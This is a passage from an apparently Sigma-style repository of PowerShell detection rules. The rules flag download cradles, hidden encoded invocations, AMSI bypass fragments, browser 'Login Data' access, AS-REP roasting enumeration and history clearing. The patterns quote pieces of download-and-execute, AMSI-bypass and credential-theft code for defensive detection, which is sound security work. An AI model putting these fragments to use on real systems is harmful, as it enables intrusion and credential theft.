DoesNotRequirePreAuth\n        - ContextInfo|contains|all:\n              - get-aduser\n              - '-f '\n              - '-pr '\n              - DoesNotRequirePreAuth\n    condition: 1 of selection_*\nfalsepositives:\n    - Administrator script\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_download.yml",
    "content": "title: Suspicious PowerShell Download - PoshModule\nid: de41232e-12e8-49fa-86bc-c05c7e722df9\nrelated:\n    - id: 65531a81-a694-4e31-ae04-f8ba5bc33759\n      type: derived\nstatus: test\ndescription: Detects suspicious PowerShell download command\nreferences:\n    - https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0\n    - https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-05\nmodified: 2023-01-20\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_webclient_:\n        ContextInfo|contains: 'System.Net.WebClient'\n    selection_function:\n        ContextInfo|contains:\n            - '.DownloadFile('\n            - '.DownloadString('\n    condition: all of selection_*\nfalsepositives:\n    - PowerShell scripts that download content from the Internet\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml",
    "content": "title: Use Get-NetTCPConnection - PowerShell Module\nid: aff815cc-e400-4bf0-a47a-5d8a2407d4e1\nstatus: test\ndescription: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell\nauthor: frack113\ndate: 2021-12-10\nmodified: 2022-12-02\ntags:\n    - attack.discovery\n    - attack.t1049\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains: 'Get-NetTCPConnection'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml",
    "content": "title: Suspicious PowerShell Invocations - Generic - PowerShell Module\nid: bbb80e91-5746-4fbe-8898-122e2cafdbf4\nrelated:\n    - id: 3d304fda-78aa-43ed-975c-d740798a49c1\n      type: derived\n    - id: ed965133-513f-41d9-a441-e38076a0798f\n      type: similar\nstatus: test\ndescription: Detects suspicious PowerShell invocation command parameters\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2017-03-12\nmodified: 2023-01-03\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_encoded:\n        ContextInfo|contains:\n            - ' -enc '\n            - ' -EncodedCommand '\n            - ' -ec '\n    selection_hidden:\n        ContextInfo|contains:\n            - ' -w hidden '\n            - ' -window hidden '\n            - ' -windowstyle hidden '\n            - ' -w 1 '\n    selection_noninteractive:\n        ContextInfo|contains:\n            - ' -noni '\n            - ' -noninteractive '\n    condition: all of selection*\nfalsepositives:\n    - Very special / sneaky PowerShell scripts\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml",
    "content": "title: Suspicious PowerShell Invocations - Specific - PowerShell Module\nid: 8ff28fdd-e2fa-4dfa-aeda-ef3d61c62090\nrelated:\n    - id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c\n      type: obsolete\n    - id: ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71\n      type: similar\n    - id: 536e2947-3729-478c-9903-745aaffe60d2\n      type: similar\nstatus: test\ndescription: Detects suspicious PowerShell invocation command parameters\nreferences:\n    - Internal Research\n    - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro\ndate: 2017-03-05\nmodified: 2025-02-17\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_convert_b64:\n        ContextInfo|contains|all:\n            - '-nop'\n            - ' -w '\n            - 'hidden'\n            - ' -c '\n            - '[Convert]::FromBase64String'\n    selection_iex:\n        ContextInfo|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-noni'\n            - '-nop'\n            - ' -c '\n            - 'iex'\n            - 'New-Object'\n    selection_enc:\n        ContextInfo|contains|all:\n            - ' -w '\n            - 'hidden'\n            - '-ep'\n            - 'bypass'\n            - '-Enc'\n    selection_reg:\n        ContextInfo|contains|all:\n            - 'powershell'\n            - 'reg'\n            - 'add'\n        ContextInfo|contains:\n            - '\\software\\microsoft\\windows\\currentversion\\run'\n            - '\\software\\wow6432node\\microsoft\\windows\\currentversion\\run'\n            - '\\software\\microsoft\\windows\\currentversion\\policies\\explorer\\run'\n    selection_webclient:\n        ContextInfo|contains|all:\n            - 'bypass'\n            - '-noprofile'\n            - '-windowstyle'\n            - 'hidden'\n            - 'new-object'\n            - 'system.net.webclient'\n            - '.download'\n    selection_iex_webclient:\n        ContextInfo|contains|all:\n            - 'iex'\n            - 'New-Object'\n            - 'Net.WebClient'\n            - '.Download'\n    filter_chocolatey:\n        ContextInfo|contains:\n            - \"(New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1\"\n            - 'Write-ChocolateyWarning'\n    condition: 1 of selection_* and not 1 of filter_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml",
    "content": "title: Suspicious Get Local Groups Information\nid: cef24b90-dddc-4ae1-a09a-8764872f69fc\nrelated:\n    - id: fa6a5a45-3ee2-4529-aa14-ee5edc9e29cb\n      type: similar\nstatus: test\ndescription: |\n    Detects the use of PowerShell modules and cmdlets to gather local group information.\n    Adversaries may use local system permission groups to determine which groups exist and which users belong to a particular group such as the local administrators group.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nauthor: frack113\ndate: 2021-12-12\nmodified: 2025-08-22\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection_localgroup:\n        - Payload|contains:\n              - 'get-localgroup '\n              - 'get-localgroupmember '\n        - ContextInfo|contains:\n              - 'get-localgroup '\n              - 'get-localgroupmember '\n    selection_wmi_module:\n        - Payload|contains:\n              - 'get-wmiobject '\n              - 'gwmi '\n              - 'get-ciminstance '\n              - 'gcim '\n        - ContextInfo|contains|all:\n              - 'get-wmiobject '\n              - 'gwmi '\n              - 'get-ciminstance '\n              - 'gcim '\n    selection_wmi_class:\n        - Payload|contains: 'win32_group'\n        - ContextInfo|contains: 'win32_group'\n    condition: selection_localgroup or all of selection_wmi_*\nfalsepositives:\n    - Administrator script\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml",
    "content": "title: Suspicious Computer Machine Password by PowerShell\nid: e3818659-5016-4811-a73c-dde4679169d2\nstatus: test\ndescription: |\n    The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain.\n    You can use it to reset the password of the local computer.\nreferences:\n    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1\n    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nauthor: frack113\ndate: 2022-02-21\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains: 'Reset-ComputerMachinePassword'\n    condition: selection\nfalsepositives:\n    - Administrator PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml",
    "content": "title: Suspicious Get Information for SMB Share - PowerShell Module\nid: 6942bd25-5970-40ab-af49-944247103358\nstatus: test\ndescription: |\n    Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and\n    to identify potential systems of interest for Lateral Movement.\n    Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md\nauthor: frack113\ndate: 2021-12-15\nmodified: 2022-12-02\ntags:\n    - attack.discovery\n    - attack.t1069.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        - Payload|contains: get-smbshare\n        - ContextInfo|contains: get-smbshare\n    condition: selection\nfalsepositives:\n    - Administrator script\nlevel: low\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_susp_zip_compress.yml",
    "content": "title: Zip A Folder With PowerShell For Staging In Temp  - PowerShell Module\nid: daf7eb81-35fd-410d-9d7a-657837e602bb # PowerShell Module\nrelated:\n    - id: 71ff406e-b633-4989-96ec-bc49d825a412 # PowerShell Classic\n      type: similar\n    - id: b7a3c9a3-09ea-4934-8864-6a32cacd98d9 # PowerShell Script\n      type: similar\n    - id: 85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98 # Process Creation\n      type: similar\nstatus: test\ndescription: |\n    Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\n    An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a\nauthor: Nasreddine Bencherchali (Nextron Systems), frack113\ndate: 2021-07-20\nmodified: 2023-12-18\ntags:\n    - attack.collection\n    - attack.t1074.001\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains|all:\n            - 'Compress-Archive -Path*-DestinationPath $env:TEMP'\n            - 'Compress-Archive -Path*-DestinationPath*\\AppData\\Local\\Temp\\'\n            - 'Compress-Archive -Path*-DestinationPath*:\\Windows\\Temp\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml",
    "content": "title: SyncAppvPublishingServer Bypass Powershell Restriction - PS Module\nid: fe5ce7eb-dad8-467c-84a9-31ec23bd644a\nrelated:\n    - id: fde7929d-8beb-4a4c-b922-be9974671667\n      type: derived\n    - id: 9f7aa113-9da6-4a8d-907c-5f1a4b908299\n      type: derived\nstatus: test\ndescription: Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions.\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/\nauthor: 'Ensar Şamil, @sblmsrsn, OSCD Community'\ndate: 2020-10-05\nmodified: 2022-12-02\ntags:\n    - attack.defense-evasion\n    - attack.t1218\nlogsource:\n    product: windows\n    category: ps_module\n    definition: 0ad03ef1-f21b-4a79-8ce8-e6900c54b65b\ndetection:\n    selection:\n        ContextInfo|contains: 'SyncAppvPublishingServer.exe'\n    condition: selection\nfalsepositives:\n    - App-V clients\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_aadinternals_cmdlets_execution.yml",
    "content": "title: AADInternals PowerShell Cmdlets Execution - PsScript\nid: 91e69562-2426-42ce-a647-711b8152ced6\nrelated:\n    - id: c86500e9-a645-4680-98d7-f882c70c1ea3\n      type: similar\nstatus: test\ndescription: Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365 which can be abused by threat actors to attack Azure AD or Office 365.\nreferences:\n    - https://o365blog.com/aadinternals/\n    - https://github.com/Gerenios/AADInternals\nauthor: Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2022-12-23\nmodified: 2025-02-06\ntags:\n    - attack.execution\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.credential-access\n    - attack.impact\nlogsource:\n    product: windows\n    category: ps_script\n    definition: Script Block Logging must be enabled\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            # Since most of the cmdlets use a unique enough string which is \"-AADInt\" we only used that portion. For a complete list please check the references linked above\n            - 'Add-AADInt'\n            - 'ConvertTo-AADInt'\n            - 'Disable-AADInt'\n            - 'Enable-AADInt'\n            - 'Export-AADInt'\n            - 'Find-AADInt'\n            - 'Get-AADInt'\n            - 'Grant-AADInt'\n            - 'Initialize-AADInt'\n            - 'Install-AADInt'\n            - 'Invoke-AADInt'\n            - 'Join-AADInt'\n            - 'New-AADInt'\n            - 'Open-AADInt'\n            - 'Read-AADInt'\n            - 'Register-AADInt'\n            - 'Remove-AADInt'\n            - 'Reset-AADInt'\n            - 'Resolve-AADInt'\n            - 'Restore-AADInt'\n            - 'Save-AADInt'\n            - 'Search-AADInt'\n            - 'Send-AADInt'\n            - 'Set-AADInt'\n            - 'Start-AADInt'\n            - 'Unprotect-AADInt'\n            - 'Update-AADInt'\n    condition: selection\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_access_to_browser_login_data.yml",
    "content": "title: Access to Browser Login Data\nid: fc028194-969d-4122-8abe-0470d5b8f12f\nrelated:\n    - id: 98f4c75c-3089-44f3-b733-b327b9cd9c9d\n      type: obsolete\n    - id: 47147b5b-9e17-4d76-b8d2-7bac24c5ce1b\n      type: similar\nstatus: test\ndescription: |\n    Adversaries may acquire credentials from web browsers by reading files specific to the target browser.\n    Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future.\n    Web browsers typically store the credentials in an encrypted format within a credential store.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md\nauthor: frack113\ndate: 2022-01-30\ntags:\n    - attack.credential-access\n    - attack.t1555.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - Copy-Item\n            - '-Destination'\n    selection_path:\n        ScriptBlockText|contains:\n            - '\\Opera Software\\Opera Stable\\Login Data'\n            - '\\Mozilla\\Firefox\\Profiles'\n            - '\\Microsoft\\Edge\\User Data\\Default'\n            - '\\Google\\Chrome\\User Data\\Default\\Login Data'\n            - '\\Google\\Chrome\\User Data\\Default\\Login Data For Account'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_active_directory_module_dll_import.yml",
    "content": "title: Potential Active Directory Enumeration Using AD Module - PsScript\nid: 9e620995-f2d8-4630-8430-4afd89f77604\nrelated:\n    - id: 70bc5215-526f-4477-963c-a47a5c9ebd12\n      type: similar\n    - id: 74176142-4684-4d8a-8b0a-713257e7df8e\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Import-Module\" cmdlet to load the \"Microsoft.ActiveDirectory.Management.dll\" DLL, which is often used by attackers to perform AD enumeration.\nreferences:\n    - https://github.com/samratashok/ADModule\n    - https://twitter.com/cyb3rops/status/1617108657166061568?s=20\n    - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges\nauthor: frack113, Nasreddine Bencherchali\ndate: 2023-01-22\ntags:\n    - attack.reconnaissance\n    - attack.discovery\n    - attack.impact\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_generic:\n        ScriptBlockText|contains|all:\n            - 'Import-Module '\n            - 'Microsoft.ActiveDirectory.Management.dll'\n    selection_specific:\n        ScriptBlockText|contains: 'ipmo Microsoft.ActiveDirectory.Management.dll'\n    condition: 1 of selection_*\nfalsepositives:\n    - Legitimate use of the library for administrative activity\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_add_dnsclient_rule.yml",
    "content": "title: Powershell Add Name Resolution Policy Table Rule\nid: 4368354e-1797-463c-bc39-a309effbe8d7\nstatus: test\ndescription: |\n  Detects PowerShell scripts that add a Name Resolution Policy Table (NRPT) rule for the specified namespace.\n  This bypasses the default DNS server and uses a specified server for answering the query.\nreferences:\n    - https://twitter.com/NathanMcNulty/status/1569497348841287681\n    - https://learn.microsoft.com/en-us/powershell/module/dnsclient/add-dnsclientnrptrule?view=windowsserver2022-ps\nauthor: Borna Talebi\ndate: 2021-09-14\nmodified: 2022-10-09\ntags:\n    - attack.impact\n    - attack.t1565\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - 'Add-DnsClientNrptRule'\n            - '-Namesp'\n            - '-NameSe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_add_windows_capability.yml",
    "content": "title: Add Windows Capability Via PowerShell Script\nid: 155c7fd5-47b4-49b2-bbeb-eb4fab335429\nrelated:\n    - id: b36d01a3-ddaf-4804-be18-18a6247adfcd\n      type: similar\nstatus: test\ndescription: Detects usage of the \"Add-WindowsCapability\" cmdlet to add Windows capabilities. Notable capabilities could be \"OpenSSH\" and others.\nreferences:\n    - https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell\n    - https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-22\nmodified: 2023-05-09\ntags:\n    - attack.execution\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_cmdlet:\n        ScriptBlockText|contains: 'Add-WindowsCapability '\n    selection_capa:\n        ScriptBlockText|contains: '-Name OpenSSH.' # For both \"OpenSSH.Server\" and \"OpenSSH.Client\"\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate usage of the capabilities by administrators or users. Add additional filters accordingly.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml",
    "content": "title: PowerShell ADRecon Execution\nid: bf72941a-cba0-41ea-b18c-9aca3925690d\nstatus: test\ndescription: Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7\nreferences:\n    - https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1\n    - https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319\nauthor: Bhabesh Raj\ndate: 2021-07-16\nmodified: 2022-09-06\ntags:\n    - attack.discovery\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - 'Function Get-ADRExcelComOb'\n            - 'Get-ADRGPO'\n            - 'Get-ADRDomainController'\n            - 'ADRecon-Report.xlsx' # Default\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_amsi_bypass_pattern_nov22.yml",
    "content": "title: AMSI Bypass Pattern Assembly GetType\nid: e0d6c087-2d1c-47fd-8799-3904103c5a98\nstatus: test\ndescription: Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts\nreferences:\n    - https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/\n    - https://twitter.com/cyb3rops/status/1588574518057979905?s=20&t=A7hh93ONM7ni1Rj1jO5OaA\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-11-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\n    - attack.execution\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains|all:\n            - '[Ref].Assembly.GetType'\n            - 'SetValue($null,$true)'\n            - 'NonPublic,Static'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_amsi_null_bits_bypass.yml",
    "content": "title: Potential AMSI Bypass Script Using NULL Bits\nid: fa2559c8-1197-471d-9cdd-05a0273d4522\nrelated:\n    - id: 92a974db-ab84-457f-9ec0-55db83d7a825\n      type: similar\nstatus: test\ndescription: Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities\nreferences:\n    - https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-04\nmodified: 2023-05-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains:\n            - \"if(0){{{0}}}' -f $(0 -as [char]) +\"\n            - \"#<NULL>\"\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_apt_silence_eda.yml",
    "content": "title: Silence.EDA Detection\nid: 3ceb2083-a27f-449a-be33-14ec1b7cc973\nstatus: test\ndescription: Detects Silence EmpireDNSAgent as described in the Group-IB report\nreferences:\n    - https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf\nauthor: Alina Stepchenkova, Group-IB, oscd.community\ndate: 2019-11-01\nmodified: 2023-04-03\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.command-and-control\n    - attack.t1071.004\n    - attack.t1572\n    - attack.impact\n    - attack.t1529\n    - attack.g0091\n    - attack.s0363\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    empire:\n        # better to randomise the order\n        ScriptBlockText|contains|all:\n            - 'System.Diagnostics.Process'\n            - 'Stop-Computer'\n            - 'Restart-Computer'\n            - 'Exception in execution'\n            - '$cmdargs'\n            - 'Close-Dnscat2Tunnel'\n    dnscat:\n        # better to randomise the order\n        ScriptBlockText|contains|all:\n            - 'set type=$LookupType`nserver'\n            - '$Command | nslookup 2>&1 | Out-String'\n            - 'New-RandomDNSField'\n            - '[Convert]::ToString($SYNOptions, 16)'\n            - '$Session.Dead = $True'\n            - '$Session[\"Driver\"] -eq'\n    condition: empire and dnscat\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_as_rep_roasting.yml",
    "content": "title: Get-ADUser Enumeration Using UserAccountControl Flags\nid: 96c982fe-3d08-4df4-bed2-eb14e02f21c8\nstatus: test\ndescription: Detects AS-REP roasting, an attack that is often overlooked. It is not very common as you have to explicitly set accounts that do not require pre-authentication.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting\n    - https://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/\nauthor: frack113\ndate: 2022-03-17\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        # 4194304 DONT_REQ_PREAUTH\n        ScriptBlockText|contains|all:\n            - 'Get-ADUser'\n            - '-Filter'\n            - 'useraccountcontrol'\n            - '-band'\n            - '4194304'\n    condition: selection\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_audio_exfiltration.yml",
    "content": "title: Potential Data Exfiltration Via Audio File\nid: e4f93c99-396f-47c8-bb0f-201b1fa69034\nstatus: test\ndescription: Detects potential exfiltration attempt via audio file using PowerShell\nreferences:\n    - https://github.com/gtworek/PSBits/blob/e97cbbb173b31cbc4d37244d3412de0a114dacfb/NoDLP/bin2wav.ps1\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-01-16\ntags:\n    - attack.exfiltration\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_main:\n        ScriptBlockText|contains|all:\n            - '[System.Math]::'\n            - '[IO.FileMode]::'\n            - 'BinaryWriter'\n    selection_header_wav:\n        ScriptBlockText|contains|all:\n            # Byte chunks from the WAV header used in the example POC\n            # You can extend this for different audio formats by adding different selections\n            - '0x52'\n            - '0x49'\n            - '0x46'\n            - '0x57'\n            - '0x41'\n            - '0x56'\n            - '0x45'\n            - '0xAC'\n    condition: selection_main and 1 of selection_header_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_automated_collection.yml",
    "content": "title: Automated Collection Command PowerShell\nid: c1dda054-d638-4c16-afc8-53e007f3fbc5\nstatus: test\ndescription: Once established within a system or network, an adversary may use automated techniques for collecting internal data.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md\nauthor: frack113\ndate: 2021-07-28\nmodified: 2022-12-25\ntags:\n    - attack.collection\n    - attack.t1119\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection_ext:\n        ScriptBlockText|contains:\n            - '.doc'\n            - '.docx'\n            - '.xls'\n            - '.xlsx'\n            - '.ppt'\n            - '.pptx'\n            - '.rtf'\n            - '.pdf'\n            - '.txt'\n    selection_cmd:\n        ScriptBlockText|contains|all:\n            - 'Get-ChildItem'\n            - ' -Recurse '\n            - ' -Include '\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_capture_screenshots.yml",
    "content": "title: Windows Screen Capture with CopyFromScreen\nid: d4a11f63-2390-411c-9adf-d791fd152830\nstatus: test\ndescription: |\n    Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation.\n    Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen\nauthor: frack113\ndate: 2021-12-28\nmodified: 2022-07-07\ntags:\n    - attack.collection\n    - attack.t1113\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection:\n        ScriptBlockText|contains: '.CopyFromScreen'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml",
    "content": "title: Clear PowerShell History - PowerShell\nid: 26b692dc-1722-49b2-b496-a8258aa6371d\nrelated:\n    - id: dfba4ce1-e0ea-495f-986e-97140f31af2d\n      type: derived\nstatus: test\ndescription: Detects keywords that could indicate clearing PowerShell history\nreferences:\n    - https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a\nauthor: Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community\ndate: 2022-01-25\nmodified: 2022-12-02\ntags:\n    - attack.defense-evasion\n    - attack.t1070.003\nlogsource:\n    product: windows\n    category: ps_script\n    definition: 'Requirements: Script Block Logging must be enabled'\ndetection:\n    selection1a:\n        ScriptBlockText|contains:\n            - 'del'\n            - 'Remove-Item'\n            - 'rm'\n    selection1b:\n        ScriptBlockText|contains: '(Get-PSReadlineOption).HistorySavePath'\n    selection_2:\n        ScriptBlockText|contains|all:\n            - 'Set-PSReadlineOption'\n            - '–HistorySaveStyle'  # not sure if the homoglyph –/- is intended, just checking for both\n            - 'SaveNothing'\n    selection_3:\n        ScriptBlockText|contains|all:\n            - 'Set-PSReadlineOption'\n            - '-HistorySaveStyle'\n            - 'SaveNothing'\n    condition: 1 of selection_* or all of selection1*\nfalsepositives:\n    - Legitimate PowerShell scripts\nlevel: medium\n"
  },
  {
    "path": "rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml",
